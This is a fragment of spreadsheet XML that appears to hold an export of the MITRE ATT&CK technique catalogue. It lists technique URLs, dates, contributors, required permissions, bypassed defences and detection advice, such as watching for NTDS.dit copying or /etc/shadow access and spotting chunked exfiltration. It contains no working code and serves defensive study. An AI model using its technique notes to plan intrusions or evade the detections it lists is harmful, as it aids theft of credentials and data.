        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>detection</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>is sub-technique</t>
  </si>
  <si>
    <t>sub-technique of</t>
  </si>
  <si>
    <t>contributors</t>
  </si>
  <si>
    <t>system requirements</t>
  </si>
  <si>
    <t>permissions required</t>
  </si>
  <si>
    <t>effective permissions</t>
  </si>
  <si>
    <t>defenses bypassed</t>
  </si>
  <si>
    <t>impact type</t>
  </si>
  <si>
    <t>supports remote</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>31 May 2017</t>
  </si>
  <si>
    <t>15 March 2020</t>
  </si>
  <si>
    <t>1.1</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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>1.0</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>2.1</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>11 February 2020</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</si>
  <si>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</si>
  <si>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Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</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</si>
  <si>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</si>
  <si>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Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>Access to Domain Controller or backup</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>21 February 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/005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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>19 March 2020</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</si>
  <si>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</si>
  <si>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Linux</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>William Cain</t>
  </si>
  <si>
    <t>Privileges to access certain files and directories</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>2.0</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</si>
  <si>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</si>
  <si>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File monitoring, File system access controls</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>17 October 2021</t>
  </si>
  <si>
    <t>1.2</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</si>
  <si>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</si>
  <si>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Windows, macOS</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1011</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</si>
  <si>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</si>
  <si>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Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>09 March 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1014</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>08 October 2021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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>17 March 2021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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>3.2</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>19 October 2020</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</si>
  <si>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</si>
  <si>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Network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</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</si>
  <si>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</si>
  <si>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Dan Borges, @1njection</t>
  </si>
  <si>
    <t>Active remote service accepting connections and valid credentials</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>25 February 2020</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</si>
  <si>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</si>
  <si>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Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>RDP service enabled, account in the Remote Desktop Users group</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/002</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</si>
  <si>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</si>
  <si>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SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>23 June 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/004</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</si>
  <si>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</si>
  <si>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Linux, macOS</t>
  </si>
  <si>
    <t>An SSH server is configured and running.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/005</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</si>
  <si>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</si>
  <si>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VNC server installed and listening for connections.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1025</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</si>
  <si>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</si>
  <si>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Privileges to access removable media drive and files</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>05 February 2020</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</si>
  <si>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</si>
  <si>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Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Filip Kafka, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Heuristic detection, Signature-based detection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>16 March 2020</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</si>
  <si>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</si>
  <si>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Compiler software (either native to the system or delivered by the adversary)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/005</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</si>
  <si>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</si>
  <si>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Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>20 May 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1029</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</si>
  <si>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</si>
  <si>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An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>1.4</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>10 February 2020</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>23 November 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/006</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</si>
  <si>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</si>
  <si>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Erye Hernandez, Palo Alto Networks</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>04 August 2021</t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1037</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>10 January 2020</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>27 March 2020</t>
  </si>
  <si>
    <t>macOS</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1037/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>15 January 2020</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</si>
  <si>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</si>
  <si>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root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</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</si>
  <si>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</si>
  <si>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Administrator</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1039</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</si>
  <si>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</si>
  <si>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Privileges to access network shared drive</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Network interface access and packet capture driver</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>2.2</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</si>
  <si>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</si>
  <si>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Praetorian</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1048</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1048/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1048/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Presence of physical medium or device</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>11 March 2020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</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</si>
  <si>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</si>
  <si>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Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>03 December 2019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>27 November 2019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</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</si>
  <si>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</si>
  <si>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User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>12 October 2020</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</si>
  <si>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</si>
  <si>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SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>User, root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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>29 March 2021</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</si>
  <si>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</si>
  <si>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Containers</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055</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</si>
  <si>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</si>
  <si>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Anti-virus, Application control</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>14 January 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/012</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/013</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/014</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056</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</si>
  <si>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</si>
  <si>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John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056/002</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</si>
  <si>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</si>
  <si>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Matthew Molyett, @s1air, Cisco Talos</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>An externally facing login portal is configured.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>Administrator, SYSTEM may provide better process ownership details</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</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</si>
  <si>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</si>
  <si>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Phil Stokes, SentinelOne</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/006</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</si>
  <si>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</si>
  <si>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Python is installed.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>23 June 2020</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</si>
  <si>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</si>
  <si>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Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>20 October 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1068</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>2.4</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>12 March 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>28 January 2020</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</si>
  <si>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</si>
  <si>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Clearing the Windows event logs requires Administrator permissions</t>
  </si>
  <si>
    <t>Anti Virus, Host Intrusion Prevention Systems, Log Analysis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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>31 January 2020</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</si>
  <si>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</si>
  <si>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Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</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</si>
  <si>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</si>
  <si>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Walker Johnson</t>
  </si>
  <si>
    <t>Host forensic analysis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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/005</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</si>
  <si>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</si>
  <si>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Established network share connection to a remote system. Level of access depends on permissions of the account used.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/006</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</si>
  <si>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</si>
  <si>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Romain Dumont, ESET</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1071/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1071/002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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1071/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1071/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1072</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1074</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>13 March 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>Administrator, User</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</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</si>
  <si>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</si>
  <si>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Jon Sternstein, Stern Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1080</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</si>
  <si>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</si>
  <si>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Access to shared folders and content with write permissions</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>31 March 2021</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>3.1</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>14 March 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/004</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</si>
  <si>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</si>
  <si>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Matt Kelly, @breakersall</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</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</si>
  <si>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</si>
  <si>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Removable media allowed, Autorun enabled or vulnerability present that allows for code execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>19 January 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>24 June 2020</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1102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</si>
  <si>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</si>
  <si>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Anastasios Pingios</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1102/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1102/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1102/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1104</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/003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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1112</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1113</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114</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</si>
  <si>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</si>
  <si>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Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>19 February 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1123</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1124</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1125</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1127</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</si>
  <si>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</si>
  <si>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Application control</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1127/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Stefan Kanthak</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1132/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1133</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>14 December 2017</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</si>
  <si>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</si>
  <si>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SYSTEM</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>18 February 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/004</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</si>
  <si>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</si>
  <si>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Wayne Silva, F-Secure Countercept</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/005</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</si>
  <si>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</si>
  <si>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Administrator, SYSTEM</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1135</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1136</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1136/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1136/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>29 January 2020</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>07 November 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/002</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</si>
  <si>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</si>
  <si>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Office 2007, 2010, 2013, and 2016</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/005</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</si>
  <si>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</si>
  <si>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Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1140</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>16 January 2018</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1185</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</si>
  <si>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</si>
  <si>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Justin Warner, ICEBRG</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1187</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>18 April 2018</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1190</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195</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</si>
  <si>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</si>
  <si>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Veeral Patel</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</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</si>
  <si>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</si>
  <si>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Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
